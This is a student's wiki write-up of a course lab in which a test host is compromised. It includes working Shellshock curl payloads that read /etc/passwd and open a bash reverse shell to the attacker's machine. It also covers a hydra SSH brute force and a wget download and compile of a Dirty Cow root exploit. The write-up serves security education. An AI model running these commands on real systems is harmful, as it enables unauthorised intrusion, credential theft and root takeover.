Week 4 Vulnerability Detection (SEC 335) - Chromosom3/TechNotes GitHub Wiki

Reflection

This week we attacked our first target. It was a great experience and I feel as I have learned a lot. Using nmap I was able to detect the exposed running services on the box, SSH, and HTTP. From there I was able to find a vulnerability in the version of Apache being used via Google-Fu. Using ShellShock I was able to get user account information. Using this information I was able to create a password list to brute force SSH. Once on the box, I used searchsploit to find vulnerabilities with the Linux kernel to gain root access on the system. This lab taught me how important research is to exploitation. Being able to figure out what is on a system and then determine any potential exploits for those applications is a great skill to have. I think searchsploit is a great tool, though I had never used it before this assignment I can see myself using it heavily in the future.

Cupcake Exploitation

Recon

The first thing that was done to exploit this host, cupcake, was to run active recon against the target This was done by using nmap. Specifically, the command sudo nmap 10.0.5.23 -A was run to get the version information from the target. The -oG flag was added to the command with a file path (sudo nmap 10.0.5.23 -A -oG results.txt) to save the output to a file. The reason that the command results were saved to a file is so we could parse them with nmap to CSV (nmaptocsv). To install nmaptocsv you will neeed to run the following command: sudo apt update && sudo apt install python3-pip && sudo pip install nmaptocsv. With nmaptocsv you can parse the results of the nmap scan from earlier to save it into a spreadsheet (this can be used to create pivot tables in the future). To do this run nmaptocsv -i results.txt -d "," and that will return the CSV data for you to copy. Figure 1 below illustrates the results of the nmap scan and Figure 2 shows the CSV formatted results.

Figure 1: NMAP Results

Figure 2: NMAPTOCSV Results

As we can see from Figure 1 and Figure 2 the target system is running CentOS Linux. We can narrow that version down by looking at the version of OpenSSH (5.3) and Apache (2.2.15). A simple Google search of “Apache 2.2.15 CentOS “ shows a result for a form post titled “Centos 6.8 and apache-2.2.15 Vulnerability” as shown in Figure 3. This is a good sign as it helps narrow down the version and lets us know there are vulnerabilities associated with this service.

Figure 3: Google Search Result

If we navigate to the HTTP server in a web browser we are shown a simple webpage (Figure 4) that has a hyperlink to another simple page (Figure 5). Looking at the second page we see it’s displaying the system hostname and uptime. These two items seem to be the direct output of the hostname and uptime commands. This means that the web server is executing bash to present us with this information. After some Googling, it seems that this host might be susceptible to ShellShock.

Figure 4: Webserver Landing Page

Figure 5: Server Status Page

After some research on ShellShock, we can find plenty of examples of how to exploit the vulnerability. Specifically, this post by Max Allan provided me with a lot of details and explanation on this vulnerability. Armed with the information from the post above I attempted to execute the exploit to see if it in fact existed. The command used can be seen below.

curl -v 10.0.5.23/cgi-bin/status -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "

The above command executed succesfully and returned the contents of the /etc/passwd file from the remote host. This is shown in Figure 6 below.

Figure 6: RCE Proof

Figure 6 provides us with a lot of useful information. Specifically, we can see the user accounts on the system. The one of interest is named samwise. Now that we have a username we can begin to build a targeted password list. We will use the rockyou password list for this. In this lab, the password list was saved to /usr/share/rockyou.txt.gz. To uncompress the file you can run sudo gzip -d rockyou.txt.gz. From here we can grep the file for any passwords that contain the username samwise in them. We want this grep search to be case insensitive so we will use the -i flag. The full command should look like this: grep -i samwise /usr/share/rockyou.txt > passwordlist.txt. Note we are piping the results of the grep to a file. This is for us to use later in our brute force attempt.

Now that we have a targeted password list for the brute force we can attempt to get in via SSH using hydra. To do this you will want to run the following command: hydra -l samwise -P samlist.txt 10.0.5.23 -t 4 ssh. This command tells hydra to use the username “samwise” with a password file of “samlist.txt”. It also tells hydra that the target server has an IP of 10.0.5.23 and that only 4 connections should be conducted at once via SSH. Figure 7 shows the results of the command.

Figure 7: Hydra results

If you have issues with SSH on the target you can add the following to your ~/.ssh/config file.

HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedAlgorithms +ssh-rsa

Brute forcing the SSH credentials is one way to get a foothold onto the system. Another way to achieve this is by establishing a remote shell as the Apache user. This can be done by running nc -lvp 5055 (where 5055 is the port) followed by curl -v 10.0.5.23/cgi-bin/status -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/10.0.99.36/5055 0>&1 ". The first command creates a netcat listener on the attacker's machine. The second command runs /bin/bash -i >& /dev/tcp/10.0.99.36/5055 0>&1 on the remote system. This command connects back to the netcat listener and allows you to run commands as Apache as shown in Figure 8.

Figure 8: Access via Apache Account

Once initial access on the system was gained I ran the uname command to get the kernel version. From there I ran searchsploit linux kernel 2.6 on my Kali machine to get a list of exploits that can be run on the remote system’s Linux kernel. There were a few exploits relating to “Dirty Cow” that seemed promising. For this lab, we used searchsploit module 40839 to exploit “Dirty Cow” on the remote system. To do this I ran searchsploit -m 40839 on my Kali machine to download the code that would be needed to exploit the vulnerability. To prevent errors when compiling I needed to move the files over to the target system and compile them there. This was done by creating an HTTP server on my Kali machine using Python. The command for that is python3 -m http.server 5050 where 5050 is the port number. From there on the target machine I ran wget http://{10.0.99.36}:{5050}/40839.c to download the file. Once the file was downloaded we can use the gcc utility to compile the code for execution. Running gcc 40839.c -o cow will throw errors because the libraries are not found. Using gcc 40839.c -o cow -lpthread -lcrypt we can fix the compiling errors. This will create a binary file called “cow” that you can execute to get root. At this point, you run the executable and set the new password for the firefart user account. Figure 9 shows the command execution.

Figure 9: Dirty Cow Execution